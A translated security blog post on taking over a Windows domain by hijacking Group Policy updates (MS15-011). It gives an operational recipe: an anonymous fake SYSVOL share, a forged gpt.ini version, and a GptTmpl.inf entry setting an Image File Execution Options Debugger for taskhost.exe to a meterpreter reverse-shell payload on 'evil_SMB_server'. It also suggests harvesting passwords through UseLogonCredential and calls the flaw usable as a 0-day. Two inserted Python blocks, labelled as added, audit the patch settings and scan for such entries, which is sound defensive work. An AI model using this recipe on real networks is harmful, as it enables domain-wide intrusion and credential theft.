Preface
"Windows Domain" is translated into Chinese as 域. A domain is the logical organizational unit of the Windows network operating system, and also a logical organizational unit of the Internet. It consists of all the user computers, printers, user accounts and other security principals, and is managed by domain controllers.
A domain is a LAN management facility that Microsoft provides to enterprises so that IT staff can efficiently manage and maintain every host and user on the local network. The domain sits at the very core of each enterprise; a large number of core business applications run on top of it, such as the mail system, collaboration systems and file sharing.
In a network penetration attack, an attacker who obtains control of the domain may be able to obtain the company's secrets and control everything in it. Domain security is therefore the most critical link in enterprise security, and Microsoft itself keeps hardening the domain.
The documents and tools leaked from the NSA made people realise how fragile the underlying network equipment is, but some operations and security staff still cling to the illusion that, as long as good computer habits are followed, an insecure underlying network can hardly threaten the security of the domain. Reality is usually otherwise: a Windows domain is itself very fragile, especially in an insecure network environment, because the domain is designed and built on the assumption that the underlying network can be trusted.
This article uses a different method to complete an intrusion into a Windows domain starting from the underlying network.
Principle
Once the underlying network is compromised, an attacker can easily hijack traffic and forge network nodes. The most basic design idea of a traffic-hijacking attack is built on a hypothesis: if a certain device were hijacked, what could be achieved?
If the domain controller were hijacked, what could be achieved?
Starting from this hypothesis, a series of tests was carried out; one of them is presented here for discussion.
Microsoft's website describes Group Policy as follows:
Group Policy is the easiest way to access and configure computer and user settings on a network based on Active Directory Domain Services (AD DS). If your enterprise is not using Group Policy, it is missing a great opportunity to reduce costs, control configurations, keep users productive and happy, and strengthen security. Configuring with Group Policy can be seen as "killing several birds with one stone".
Group Policy is one of the ways in which the domain controller configures the machines in the domain. A Windows domain member periodically asks the domain controller for Group Policy updates to make sure it is using the latest domain policy. The update process works like this: every 90 min + random() * 30 min, the domain member asks the domain controller for the policy version number. This version number is stored in the gpt.ini file on the domain controller, located in the folder
\\domain_name\sysvol\domain_name\Policies
and its content is:
If this version number equals the member's own version number, the system considers its Group Policy to be up to date; it then resets the timer and waits for the next interval before requesting an update again.
The detailed packet exchange is shown in the figure below:

If the member's own version number is lower than the returned one, the system considers its Group Policy outdated and goes on to request the registry.pol and GptTmpl.inf files. The detailed packet exchange is shown in the figure below:

GptTmpl.inf is a template file that allows the registry of a domain member to be modified remotely.
If the GptTmpl.inf file is hijacked and modified, the registry of any domain member that requests this file can be modified at will. One way to use the hijacked file to intrude into the domain is to modify the registry to add a startup entry on the domain machine; when the machine reboots, the specified file or script runs.
This faces one problem, however: one has to wait until the machine is rebooted. The machine's reboot cycle may be very long, and the attacker's startup script or payload must stay available at its storage location all that time, which is inconvenient. The earlier CoreSecurity test POC modified the AppInit_DLLs registry value, but that value has been disabled for many years. A simpler and more efficient way is needed. After many exploitation tests, a very handy method was finally found, based on a magical registry key:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
By modifying this key, a debugger can be attached to any Windows program. For example, cmd.exe can be given the debugger debugger.exe, so that when you launch cmd.exe, what actually runs is:
In this way a debugger can be attached to IE, Chrome, or any other program the user is likely to run, which is obviously much faster than waiting for the user to reboot.
Even when the user's privileges are restricted, the machine's registry can still be modified by hijacking Group Policy. After the hijack, however, the registry must be cleaned up, because the debugger program cannot remain there forever, and the user might afterwards be unable to launch that program. Modifying the value also requires administrator privileges.
To avoid guessing wrong about which program the user runs, and to avoid the long wait, a better solution was found after many tests. After updating Group Policy, the system creates a new process, taskhost.exe, with SYSTEM privileges, even when the user is in a restricted state. So by registering a debugger for taskhost.exe, a SYSTEM shell is obtained immediately after the system finishes updating Group Policy. No long wait, no reboot, no user action; everything completes silently.
Of course, this way of hijacking Group Policy to execute commands was reported to Microsoft long ago, and on 10 February 2015 Microsoft published security bulletin MS15-011 and provided patch KB3000483. Microsoft chose to fix the vulnerability on the client side by enforcing "SMB Signing".
However, although the security bulletin was published and the patch provided more than a year ago, the patch is not enabled by default.
Microsoft's official bulletin contains this passage:
This security update requires the following steps to be performed in order to protect against the vulnerability described in the bulletin (MS15-011). To enable this functionality, a system administrator must apply the following Group Policy settings in addition to installing security update 3000483.
Which means:
The system administrator must configure Group Policy manually and enable "UNC Hardened Access" to avoid the security risk brought by MS15-011. The detailed configuration is on Microsoft's official website, summarised into 12 steps; the link is:
https://support.microsoft.com/en-us/kb/3000483
Microsoft regards this as a vulnerability and has provided the corresponding patch. But the patch is not enabled by default; the administrator must manually go through the 12 configuration steps to enable it.
So in most environments the vulnerability can still be used as a 0-day.
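As an added example (not code from the original post), the following Python models the check an administrator should make after applying KB3000483: the UNC Hardened Access policy is stored as values whose name is a UNC pattern and whose data is a flag list, and both RequireMutualAuthentication and RequireIntegrity must be set for the SYSVOL and NETLOGON shares that every domain member reads policy from. The registry data and the domain controller name are constructed samples.

```python
"""Audit UNC Hardened Access entries (the KB3000483 mitigation for MS15-011).

On a real host the entries live under
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\NetworkProvider\\HardenedPaths;
here they are modelled as a dict {UNC pattern: flag string} built from
constructed sample data. Added example, not the post's own code.
"""
import fnmatch

REQUIRED = ("RequireMutualAuthentication", "RequireIntegrity")


def parse_flags(data):
    """'RequireMutualAuthentication=1, RequireIntegrity=1' -> {name: int}."""
    flags = {}
    for item in data.split(","):
        item = item.strip()
        if not item:
            continue
        name, _, value = item.partition("=")
        flags[name.strip()] = int(value.strip() or 0)
    return flags


def path_is_hardened(path, hardened_paths):
    """True if a pattern matches `path` and sets every required flag to 1."""
    # Windows compares UNC paths case-insensitively, so lowercase both sides.
    for pattern, data in hardened_paths.items():
        if fnmatch.fnmatchcase(path.lower(), pattern.lower()):
            flags = parse_flags(data)
            if all(flags.get(name) == 1 for name in REQUIRED):
                return True
    return False


def audit(hardened_paths, dc="dc01.example.test"):
    """Return the policy shares on `dc` that are NOT hardened (empty = good)."""
    shares = [rf"\\{dc}\SYSVOL", rf"\\{dc}\NETLOGON"]
    return [share for share in shares if not path_is_hardened(share, hardened_paths)]


# Constructed samples: the configuration KB3000483 recommends, and a weak one.
RECOMMENDED = {
    r"\\*\SYSVOL": "RequireMutualAuthentication=1, RequireIntegrity=1",
    r"\\*\NETLOGON": "RequireMutualAuthentication=1, RequireIntegrity=1",
}
WEAK = {
    r"\\*\SYSVOL": "RequireIntegrity=1",   # signing only, no mutual authentication
}

if __name__ == "__main__":
    print("recommended, unprotected shares:", audit(RECOMMENDED))   # []
    print("weak, unprotected shares:", audit(WEAK))                 # both shares
```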
Test
The experimental test steps are as follows:
1. Prepare an SMB server to host the payload, and the payload itself
In this test, SMB sharing was enabled on the attacker machine and a directory was created and mapped as SYSVOL, with the command:
net share sysvol=C:\Users\TEST\Desktop\sysvol
Alternatively, enable the share from the GUI; the effect is the same. Inside the folder, create the tree structure below, because domain machines only request files at fixed locations when they ask for updates. The file structure is:
─Domain_Name
  └─Policies
     └─{31B2F340-016D-11D2-945F-00C04FB984F9}
        │  gpt.ini
        │
        └─Machine
           └─Microsoft
              └─Windows NT
                 └─SecEdit
                       GptTmpl.inf
Then enable anonymous sharing of the whole folder, allowing anyone to access it.
Prepare the payload program; this test used meterpreter_resver_tcp.exe, renamed to debugger.exe.
Depending on the hijacking method, if one chooses to modify packet contents directly or to craft the reply packets, the tree-structured directory is not needed, but the anonymous SMB share is still needed to hold the payload.
2. Data to be modified during the hijack
First modify the gpt.ini file, changing the version number in it to a larger number; for convenience it was set to 1000, as follows:
Then modify the policy file GptTmpl.inf, whose original content is:
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Version]
signature="$CHICAGO$"
Revision=1
Then make the modifications according to the design. For simplicity only the registry-modifying entry was added; the modified file content is:
[Registry Values]
MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,\\evil_SMB_server\sysvol\admin.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\muma_test.exe
[Version]
signature="$CHICAGO$"
Revision=1
Replace "evil_SMB_server" with the address of the server hosting the payload, and "debugger.exe" with the payload file.
3. Start the attack
Hijack the traffic to the attacker. There are many ways to hijack traffic here: LLMNR, NBT-NS, mDNS, ARP, BadTunnel and so on, anything works; there is a very handy tool called Responder on GitHub. This experiment, however, was carried out entirely with a program custom-built for hijacking traffic at the router.
First, the client does a tree of the whole folder, then requests gpt.ini and compares the version number, then goes on to request the GptTmpl.inf file and applies the registry template in it to the registry. After it has been applied successfully, debugger.exe is downloaded and taskhost.exe is started with it as the debugger; wait a few seconds:


done
The highest level of control over one machine has been obtained.
After waiting at most 120 min, the highest privileges on every machine in the domain can be obtained, except the domain controllers, because domain controllers do not request Group Policy updates. That said, if the domain has multiple domain controllers they request Group Policy updates from each other, and those requests can be hijacked in the same way.
With control of every device except the domain controllers, one can already move through the domain almost unhindered.
Against the domain controller, only methods such as replacing the logon script via Group Policy or adding a startup entry can be used. Alternatively, add a logon script via Group Policy that modifies the UseLogonCredential registry value; once the machines reboot, user passwords can be harvested in bulk, because a domain administrator will not log on only at the domain controller.
Or use some other, better method; if you have good ideas, please message me privately so we can discuss and test together.
In this way control of the entire domain is obtained.
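From the defender's side, the artefact this whole procedure leaves behind is a security template whose [Registry Values] section plants a Debugger value under Image File Execution Options that points at an SMB share. The Python below, an added example and not code from the post, parses that section (each line is KeyPath\Name=type,data, with type being the REG_* code) and flags both signs; SAMPLE is constructed from the modified GptTmpl.inf shown above, and the same function can be run over the real file fetched from the SecEdit folder of a policy share.

```python
r"""Scan a GptTmpl.inf security template for IFEO Debugger values and
UNC-path data in its [Registry Values] section. Added example, not the
post's code. Each entry has the form KeyPath\Name=type,data where type
is the REG_* code (1 = REG_SZ, 4 = REG_DWORD).
"""
import configparser
import re

IFEO = r"\currentversion\image file execution options"   # compared lowercase
UNC_PREFIX = re.compile(r"^\\\\[^\\]+\\")                 # data begins with \\host\


def parse_registry_values(text):
    """Return [(key_path, reg_type, data)] from the [Registry Values] section."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str                  # keep the registry path exactly as written
    cp.read_string(text)
    if not cp.has_section("Registry Values"):
        return []
    entries = []
    for key, raw in cp.items("Registry Values"):
        reg_type, _, data = raw.partition(",")
        entries.append((key, int(reg_type.strip()), data.strip()))
    return entries


def find_suspicious(text):
    """Return [(reason, key_path, data)] for entries an analyst should review."""
    findings = []
    for key, _reg_type, data in parse_registry_values(text):
        low = key.lower()
        if IFEO in low and low.endswith(r"\debugger"):
            findings.append(("IFEO Debugger set", key, data))
        if UNC_PREFIX.match(data):
            findings.append(("value points to a UNC path", key, data))
    return findings


# Constructed sample modelled on the modified GptTmpl.inf shown in the post.
SAMPLE = r"""[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,\\evil_SMB_server\sysvol\admin.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\muma_test.exe
[Version]
signature="$CHICAGO$"
Revision=1
"""

if __name__ == "__main__":
    for reason, key, data in find_suspicious(SAMPLE):
        print(f"{reason}: {key} -> {data}")
```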
Summary
Underlying network equipment is dangerous, and the underlying network can have an unimaginable impact on the applications and services above it. The security community just does not yet appreciate this deeply enough.